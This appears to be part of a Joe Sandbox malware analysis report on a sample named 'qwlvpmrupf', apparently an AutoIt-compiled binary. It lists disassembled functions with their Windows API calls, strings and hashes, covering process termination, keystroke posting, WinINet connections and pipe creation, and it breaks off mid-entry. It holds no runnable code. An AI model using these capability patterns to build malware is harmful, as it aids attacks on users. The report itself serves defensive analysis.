                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003B5437,?,?,Bad directive syntax error,0040DCD0,00000000,00000010,?,?), ref: 003DA14B
                                                • LoadStringW.USER32(00000000,?,003B5437,?), ref: 003DA152
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003DA216
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: HandleLoadMessageModuleString_wcslen
                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                • API String ID: 858772685-4153970271
                                                • Opcode ID: 45fd21633ddf60bcac1d202785e7dc1080754ae0ce60135abccb99a6aebac071
                                                • Instruction ID: 753141db054ad8467cd1eae56e0af7de5e1fea59f3611cb34eeb5245995436ba
                                                • Opcode Fuzzy Hash: 45fd21633ddf60bcac1d202785e7dc1080754ae0ce60135abccb99a6aebac071
                                                • Instruction Fuzzy Hash: 6521767280021EAFCF23AF90CC46FEE7B79BF18304F044456F519691A2DA75AA18EB51
                                                APIs
                                                • GetParent.USER32 ref: 003D293B
                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 003D2950
                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003D29DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameParentSend
                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                • API String ID: 1290815626-3381328864
                                                • Opcode ID: ab7c1422be8e45111b2dc33add2b73b20ca8581931ef6ddb239ff501c1ca5b72
                                                • Instruction ID: d789c220ae43f0daf4dfeaf43b39c3a3ba5260cdd953c716edc36f75a645b191
                                                • Opcode Fuzzy Hash: ab7c1422be8e45111b2dc33add2b73b20ca8581931ef6ddb239ff501c1ca5b72
                                                • Instruction Fuzzy Hash: 3B11E37B644307BAFA022220EC17DE777DC9F25720F224123FA00E51D2EB7669625958
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003ECADF
                                                • GetLastError.KERNEL32 ref: 003ECAF2
                                                • SetEvent.KERNEL32(?), ref: 003ECB06
                                                  • Part of subcall function 003ECBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003ECBCF
                                                  • Part of subcall function 003ECBB0: GetLastError.KERNEL32 ref: 003ECC7F
                                                  • Part of subcall function 003ECBB0: SetEvent.KERNEL32(?), ref: 003ECC93
                                                  • Part of subcall function 003ECBB0: InternetCloseHandle.WININET(00000000), ref: 003ECC9E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                • String ID:
                                                • API String ID: 337547030-0
                                                • Opcode ID: 95e4189cf1d9697a53bc887794d3b2a62cb6dfd5f3f71516e03bb20a3ab2deef
                                                • Instruction ID: e333267732cc260b8bbacac2369410a6a93782a15893f8dde19e3c4086c0223e
                                                • Opcode Fuzzy Hash: 95e4189cf1d9697a53bc887794d3b2a62cb6dfd5f3f71516e03bb20a3ab2deef
                                                • Instruction Fuzzy Hash: A631AF71610756AFDB229FB2CD45A6BBBF8FF04300B00562DF85697650D730E816DB60
                                                APIs
                                                  • Part of subcall function 003D42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 003D42E6
                                                  • Part of subcall function 003D42CC: GetCurrentThreadId.KERNEL32 ref: 003D42ED
                                                  • Part of subcall function 003D42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003D2E43), ref: 003D42F4
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 003D2E4D
                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003D2E6B
                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 003D2E6F
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 003D2E79
                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003D2E91
                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 003D2E95
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 003D2E9F
                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003D2EB3
                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 003D2EB7
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                • String ID:
                                                • API String ID: 2014098862-0
                                                • Opcode ID: 32d1254c3673a97a51932ce72348af0cf1b129f6561af4948ee133ba4ef53bc6
                                                • Instruction ID: 91d22852a4f1da0d285ec79ab4a77b40f9a75496093ef722ede725fbcdeee0c9
                                                • Opcode Fuzzy Hash: 32d1254c3673a97a51932ce72348af0cf1b129f6561af4948ee133ba4ef53bc6
                                                • Instruction Fuzzy Hash: 250175316806147BFB1067A99C8AF567F59DB99B51F100416F318AE1E0C9F254448AAD
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,003D1CD9,?,?,00000000), ref: 003D209C
                                                • HeapAlloc.KERNEL32(00000000,?,003D1CD9,?,?,00000000), ref: 003D20A3
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,003D1CD9,?,?,00000000), ref: 003D20B8
                                                • GetCurrentProcess.KERNEL32(?,00000000,?,003D1CD9,?,?,00000000), ref: 003D20C0
                                                • DuplicateHandle.KERNEL32(00000000,?,003D1CD9,?,?,00000000), ref: 003D20C3
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,003D1CD9,?,?,00000000), ref: 003D20D3
                                                • GetCurrentProcess.KERNEL32(003D1CD9,00000000,?,003D1CD9,?,?,00000000), ref: 003D20DB
                                                • DuplicateHandle.KERNEL32(00000000,?,003D1CD9,?,?,00000000), ref: 003D20DE
                                                • CreateThread.KERNEL32(00000000,00000000,003D2104,00000000,00000000,00000000), ref: 003D20F8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                • String ID:
                                                • API String ID: 1957940570-0
                                                • Opcode ID: 32424189c809f5281fe7d40a8c87cb0401af1fc28a52f473a430cbd8dcf4ea0e
                                                • Instruction ID: 8814a02534f01512cb38b9a627a6350d62c49091f3da393f6fbfbcdec2b74170
                                                • Opcode Fuzzy Hash: 32424189c809f5281fe7d40a8c87cb0401af1fc28a52f473a430cbd8dcf4ea0e
                                                • Instruction Fuzzy Hash: 6301BBB5640308BFE710ABB5DD4DF6B3BACEB89711F008421FA05EB2A1CA709C04CB24
                                                APIs
                                                  • Part of subcall function 003DDC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 003DDCC1
                                                  • Part of subcall function 003DDC9C: Process32FirstW.KERNEL32(00000000,?), ref: 003DDCCF
                                                  • Part of subcall function 003DDC9C: CloseHandle.KERNELBASE(00000000), ref: 003DDD9C
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003FAACC
                                                • GetLastError.KERNEL32 ref: 003FAADF
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003FAB12
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 003FABC7
                                                • GetLastError.KERNEL32(00000000), ref: 003FABD2
                                                • CloseHandle.KERNEL32(00000000), ref: 003FAC23
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                • String ID: SeDebugPrivilege
                                                • API String ID: 2533919879-2896544425
                                                • Opcode ID: 83848e7bf1a3f13a2eff41f456e9aa3db29404456d06149b94880b7727ba4abb
                                                • Instruction ID: 2fa3702e21a9a180a2cded18827674b9597c65c4605016ac911711503e746736
                                                • Opcode Fuzzy Hash: 83848e7bf1a3f13a2eff41f456e9aa3db29404456d06149b94880b7727ba4abb
                                                • Instruction Fuzzy Hash: 4E61C170208602AFD722DF14C594F26BBE5AF44308F15C49CE56A8F7A2C775ED49CB92
                                                APIs
                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00404284
                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00404299
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004042B3
                                                • _wcslen.LIBCMT ref: 004042F8
                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00404325
                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00404353
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window_wcslen
                                                • String ID: SysListView32
                                                • API String ID: 2147712094-78025650
                                                • Opcode ID: c0a587ce9f9237b3b7e144f4b0cccec6e685db90a2b54bf2d67f48a25502fd07
                                                • Instruction ID: f671b1f48bdb55aaf90dac5188b77860344e7bcabb3c098f03ad92a687cfe8e2
                                                • Opcode Fuzzy Hash: c0a587ce9f9237b3b7e144f4b0cccec6e685db90a2b54bf2d67f48a25502fd07
                                                • Instruction Fuzzy Hash: E541B171A00308ABDB219FA4CC45FEB7BA9EF48360F10057AFA54F72D1D77899848B94
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003DC5D9
                                                • IsMenu.USER32(00000000), ref: 003DC5F9
                                                • CreatePopupMenu.USER32 ref: 003DC62F
                                                • GetMenuItemCount.USER32(01034A78), ref: 003DC680
                                                • InsertMenuItemW.USER32(01034A78,?,00000001,00000030), ref: 003DC6A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                • String ID: 0$2
                                                • API String ID: 93392585-3793063076
                                                • Opcode ID: 46b44ced9030c2545ca025611d57145767e0a19207aef3ecd0e416966dcf9801
                                                • Instruction ID: 79d125747c51c9a4692269e002511309183ba262154d7c15ab1d074d9d190777
                                                • Opcode Fuzzy Hash: 46b44ced9030c2545ca025611d57145767e0a19207aef3ecd0e416966dcf9801
                                                • Instruction Fuzzy Hash: 3551B472930206ABDF12CFA8E984BAEBBF5AF44314F18615AF811AB391D770DD44CB15
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                • String ID: 0.0.0.0
                                                • API String ID: 642191829-3771769585
                                                • Opcode ID: 4a3c494f21e4f3803fe6e984adffe50ca3840f435106209b100ec6f44e442b23
                                                • Instruction ID: 8eadb0ae1c209b9cb3f470e9ce839389ab7ece585318900a567ec6c39ff157b6
                                                • Opcode Fuzzy Hash: 4a3c494f21e4f3803fe6e984adffe50ca3840f435106209b100ec6f44e442b23
                                                • Instruction Fuzzy Hash: 0D110336D00215AFDB2A7B70AC4AEEE3BBCEF44710F110076F545AB192EF70CA859A54
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit
                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                • API String ID: 2610073882-625585964
                                                • Opcode ID: 8d03a121ef619b3e10ecaafe02747fa7c466125ce1600f4d9a5ff96acf1f1de5
                                                • Instruction ID: 6fc0d118fdedcc6428fe8cf84f5690b2a994251a52423cd4b945332305fea914
                                                • Opcode Fuzzy Hash: 8d03a121ef619b3e10ecaafe02747fa7c466125ce1600f4d9a5ff96acf1f1de5
                                                • Instruction Fuzzy Hash: 4E918E71A00319ABDF21CFA5CC44FAEBBB8EF45714F108559F619AB280DB70A945CFA0
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 003F42C8
                                                • CharUpperBuffW.USER32(?,?), ref: 003F43D7
                                                • _wcslen.LIBCMT ref: 003F43E7
                                                • VariantClear.OLEAUT32(?), ref: 003F457C
                                                  • Part of subcall function 003E15B3: VariantInit.OLEAUT32(00000000), ref: 003E15F3
                                                  • Part of subcall function 003E15B3: VariantCopy.OLEAUT32(?,?), ref: 003E15FC
                                                  • Part of subcall function 003E15B3: VariantClear.OLEAUT32(?), ref: 003E1608
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                • API String ID: 4137639002-1221869570
                                                • Opcode ID: 0f548740d5e06064b64c200a3bfeeccb40a19572dd55e1540bdc1c3326021613
                                                • Instruction ID: 97627ef4f880581b2831cf1a61b19d0ac5bdc91cf15fb2ec4eb05e148bef9986
                                                • Opcode Fuzzy Hash: 0f548740d5e06064b64c200a3bfeeccb40a19572dd55e1540bdc1c3326021613
                                                • Instruction Fuzzy Hash: 1F9177746083059FC711EF68C48196AB7E5FF88314F14892EF98A9B351DB34ED06CB82
                                                APIs
                                                • GetMenu.USER32(?), ref: 00402AE2
                                                • GetMenuItemCount.USER32(00000000), ref: 00402B14
                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00402B3C
                                                • _wcslen.LIBCMT ref: 00402B72
                                                • GetMenuItemID.USER32(?,?), ref: 00402BAC
                                                • GetSubMenu.USER32(?,?), ref: 00402BBA
                                                  • Part of subcall function 003D42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 003D42E6
                                                  • Part of subcall function 003D42CC: GetCurrentThreadId.KERNEL32 ref: 003D42ED
                                                  • Part of subcall function 003D42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003D2E43), ref: 003D42F4
                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00402C42
                                                  • Part of subcall function 003DF1A7: Sleep.KERNEL32 ref: 003DF21F
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                • String ID:
                                                • API String ID: 4196846111-0
                                                • Opcode ID: 2cd8f4a2d4c13a45774dd3f80a4d32d0a76e14005e46dd5cd9915ac88faa72ac
                                                • Instruction ID: 25fddec4cf3db6477211e2929205b5891d0c4700f75ae741c3a70cf23ac9fa84
                                                • Opcode Fuzzy Hash: 2cd8f4a2d4c13a45774dd3f80a4d32d0a76e14005e46dd5cd9915ac88faa72ac
                                                • Instruction Fuzzy Hash: 15719235A00205AFDB11EFA4C945AAEB7F5EF48310F10846AE816BB391DB78ED418F94
                                                APIs
                                                • IsWindow.USER32(00000000), ref: 00408896
                                                • IsWindowEnabled.USER32(00000000), ref: 004088A2
                                                • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0040897D
                                                • SendMessageW.USER32(00000000,000000B0,?,?), ref: 004089B0
                                                • IsDlgButtonChecked.USER32(?,00000000), ref: 004089E8
                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 00408A0A
                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00408A22
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                • String ID:
                                                • API String ID: 4072528602-0
                                                • Opcode ID: 804f27c4b23fef6f12d1816ddeb79035b22cecb9a4bafcd83f3c6563bc20f642
                                                • Instruction ID: e65cb526f031d742acbf6e015d3f5247273554df8b1958121c5d43fca58212b3
                                                • Opcode Fuzzy Hash: 804f27c4b23fef6f12d1816ddeb79035b22cecb9a4bafcd83f3c6563bc20f642
                                                • Instruction Fuzzy Hash: C571C074600204AFEF21AF54CA84FBB7BB5EF49300F54447EE885673A1CB39A951CB19
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003D80D1
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003D80F7
                                                • SysAllocString.OLEAUT32(00000000), ref: 003D80FA
                                                • SysAllocString.OLEAUT32 ref: 003D811B
                                                • SysFreeString.OLEAUT32 ref: 003D8124
                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 003D813E
                                                • SysAllocString.OLEAUT32(?), ref: 003D814C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                • String ID:
                                                • API String ID: 3761583154-0
                                                • Opcode ID: ea9f8ea7f5504b96aabd52b7d39e93b353323f0f3c34463e8e5530632218ad97
                                                • Instruction ID: e73961fd418904af555f1f41bc094f544d49cd3c765f6557045ece8e1f21c21f
                                                • Opcode Fuzzy Hash: ea9f8ea7f5504b96aabd52b7d39e93b353323f0f3c34463e8e5530632218ad97
                                                • Instruction Fuzzy Hash: 05218676600214BFDF119FB8DC88DAA77ECEB493607018126F915DB3A0DA70EC49CB68
                                                APIs
                                                • GetStdHandle.KERNEL32(0000000C), ref: 003E0DAE
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003E0DEA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CreateHandlePipe
                                                • String ID: nul
                                                • API String ID: 1424370930-2873401336
                                                • Opcode ID: 52567d6c4baaf44bf492ffacff9cd3dc820077748b4e36560a1be06523b79970
                                                • Instruction ID: cf2a8b7d7aea45bd60e3d219ff7d1beeae6c5f2d2ef79f6fc03c0c17eb9ec564
                                                • Opcode Fuzzy Hash: 52567d6c4baaf44bf492ffacff9cd3dc820077748b4e36560a1be06523b79970
                                                • Instruction Fuzzy Hash: 2A216070500755EFDF259FA6DC04A9ABBE4AF95760F204F29F9A1E72E0D7B09880CB50
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 003E0E82
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003E0EBD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
